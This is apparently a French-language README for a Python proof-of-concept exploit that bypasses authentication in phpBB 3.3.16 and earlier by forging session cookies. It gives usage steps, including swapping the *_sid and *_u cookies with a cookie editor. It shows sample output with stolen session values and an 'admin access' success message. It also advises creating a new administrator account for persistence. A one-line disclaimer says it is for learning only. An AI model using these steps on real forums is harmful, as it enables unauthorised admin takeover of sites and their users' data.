
Preuve de concept en Python qui contourne l'authentification dans phpBB 3.3.16 et versions antérieures en falsifiant les cookies de session pour obtenir un accès administrateur.
Contournement d'authentification
poc simple de contournement d'authentification ; si vous souhaitez y accéder via un navigateur, n'oubliez pas de modifier la variable USER_AGENT dans le script en fonction de ce qui est affiché dans votre navigateur pour que cela fonctionne. utilisez un éditeur de cookies pour remplacer la valeur *_sid et *_u
phpbb python3 exploit.py https://localhost:8000 joushk
[+] Target: https://localhost:8000
[+] Target username: joushk
[+] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36
[+] Session cookies obtained:
phpbb3_cl7ge_u: 2
phpbb3_cl7ge_k:
phpbb3_cl7ge_sid: 4823a1ffeea59187eb31be1809ec0fd3
[+] User ID: 2
[!] User ID is 2 – default admin account.
[!] EXPLOIT SUCCESSFUL!
[!] You now have admin access.
[!] Note: ACP may still ask for password if re-authentication is enabled.
[+] tips: new create user and add to administrator group using bypass account auth and login to ACP Successd
[!!!Ce script est uniquement à des fins d'apprentissage]